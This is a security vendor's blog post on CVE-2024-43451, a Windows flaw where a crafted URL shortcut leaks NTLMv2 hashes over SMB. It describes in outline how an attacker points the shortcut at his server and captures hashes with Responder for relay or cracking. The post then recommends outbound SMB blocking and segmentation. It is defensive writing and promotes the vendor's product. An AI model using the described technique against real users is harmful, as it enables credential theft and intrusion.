Network Segmentation, Cyber Threats

Mitigating CVE-2024-43451 and Other Zero-Day Vulnerabilities Before they are Discovered

Published December 03, 2024 by Dekel Paz

Microsoft’s Patch Tuesday on November 12th brought to light a new zero-day vulnerability that was discovered after seeing it used in the wild. The CVE-2024-43451 vulnerability allows attackers to create a malicious URL file that communicates covertly over the SMB protocol with an external server, leaking NTLMv2 password hashes in the process. The catch is that not much interaction is needed from the user to execute the vulnerability – all it takes is a single right-click on the file, dragging the file into another folder, or even attempting to delete it.  

This common approach in the Cybersecurity industry of vulnerabilities being discovered in the wild, waiting for an official patch to be released, and rushing to apply it everywhere is clearly not working. We are leaving a huge gap for adversaries to make use of the vulnerability before we are deemed safe, only to do the same cycle again once a new zero-day vulnerability is found (not to mention unpublished vulnerabilities or ones without available patches). How can we break this cycle and make sure we are protected in the first place? 

Zero-Day Attack Details: CVE-2024-43451

To exploit this vulnerability, all an attacker needs to do is create a simple shortcut file, setting the URL to point to his server. On unpatched Windows assets, a right -click on the file is all it takes for the exploit to work. Even on patched hosts, if the user accidentally runs the file, his NTLMv2 hash will be sent to the attacker’s server. 

Malicious shortcut configured to disclose the victim’s NTLMv2 hash to an external server 

Using a tool like Responder, the attacker can capture the victim’s NTLMv2 hash which is sent over the SMB protocol. The capture hash can then be relayed to another machine to execute code on that machine, or cracked offline for retrieving the original password.  

The Responder tool captures the user’s NTLMv2 hash that was leaked from the URL file 

For additional technical information on the vulnerability, check out ClearSky’s report

The Challenge With Zero-Day CVE-2024-43451 

The vulnerability was used during a campaign targeting Ukrainian assets by UAC-0194 - a suspected Russian threat actor. The main concern with this vulnerability is that it allows attackers to steal NTLMv2 password hashes with minimal interaction from the user, hashes which can then be used to perform pass-the-hash attacks.  Several factors make this vulnerability particularly challenging for defend against: 

  1. The communication back to the attacker’s server is established over the SMB protocol, which is often not monitored enough and can be challenging to inspect (when compared to other external-reaching protocols such as HTTP, HTTPs and DNS). 
  2. The URL file format seems innocent and does not immediately raise red flags like other executable files would. Even if the user does suspect the file and decides to delete it, this action will also trigger the vulnerability. 
  3. The vulnerability affects practically all versions of Windows (with slight variations in trigger conditions). 

The conventional cybersecurity approach recommends installing updates promptly across the organization, starting with the critical infrastructure. This of course will help mitigate this vulnerability, but can bring its own set of challenges: 

  1. Installing updates across an entire computer network can be challenging, especially when aiming for full coverage of all hosts and time is of the essence. 
  2. Starting with critical infrastructure (i.e. servers) is not the right approach in this case, as clients are more likely to be affected by this attack than servers. In addition, forcing updates on end users’ computers, which we don’t always have full control over, can consume more time. 
  3. We are still left with our same approach, hoping that vendors discover and patch vulnerabilities quickly enough before attacks get to use them in our environment. 

Zero Networks offers a more active approach to defend the organization, using network segmentation to prevent this and similar vulnerabilities from being used. 

How to Mitigate Unknown Threats: Leverage a Network Outbound Block

When applying network segmentation – we often think about how to protect an asset from incoming traffic, usually by applying firewall rules to prevent other hosts from communicating with it using sensitive protocols (such as RDP, SMB and RPC). With Zero Networks’ Segmentation platform, we also allow you to deploy outbound rules on all your assets. These rules can cover internal and/or external traffic and are applied even when the asset is not connected to the corporate network (such as when working remotely). 

Outbound rule configured to block all SMB traffic to the Internet 

In the case of CVE-2024-43451, all we needed to do in advance (and should be done as good practice in any network) was to create a simple outbound rule for our assets that would block any communication to the Internet over SMB. As this protocol is often only used internally, the block rule should not have any operational effect. This would fully mitigate this and any future vulnerabilities that rely on the SMB protocol to communicate with the outside world. The same can also be created for other similar protocols, such as RDP and RPC. In case we have any assets that require these protocols to be accessible externally (such as administrators managing cloud assets), we can always create a specific rule to allow them to access specific Internet IP addresses over the required ports.  

In the following image, we can see how this CVE is first exploited and ourbound SMB traffic is allowed. However, once our outbound block rules is enabled, and we rerun the attack, we can see the traffic being blocked. This prevents an attacker from stealing NTLMv2 hashes, and also stops the compromised victim from downloading additional malware.  

Traffic from the asset to the malicious server, first allowed (before setting the outbound rule) and then blocked 

Adopt a Proactive Cybersecurity Approach to Mitigate Zero-Days Before They Happen: Network Segmentation

To mitigate CVE-2024-43451 and other zero-days before they are discovered, organizations should adopt a proactive approach to cybersecurity that goes beyond the traditional patch management cycle. Here are key strategies to implement:

Maximize Cyber Resilience with a Zero Trust Architecture

  • Ensure critical protection against unauthorized access and emerging threats by verifying every access attempt, regardless of source
  • Reduce your attack surface and limit the blast radius of a breach by limiting potential entry points and isolating every asset on your network via microsegmentation

Safeguard Domain Controllers and RPC Calls with RPCFW

Network Segmentation and Outbound Traffic Control

Enforce The Principle of Least Privilege

  • Enforce continuous verification of users, devices, and applications - this is essential as 61% of data breaches involve credentials
  • Restrict user permissions and access rights to the minimum necessary for their roles and layer just-in-time MFA to admin and service accounts
  • Implement strong access controls and regularly review and update them

Robust Endpoint Protection with Microsegmentation

Network segmentation is a crucial component of a proactive cybersecurity approach, enabling organizations to mitigate zero-day vulnerabilities before they are discovered. By implementing a Zero Trust architecture with granular access controls, organizations can significantly reduce their attack surface and limit the potential impact of breaches. This strategy, combined with robust endpoint protection and the principle of least privilege, creates a resilient security posture that can effectively defend against both known and unknown threats.

Want to see more of Zero? Drop into the Demo Room →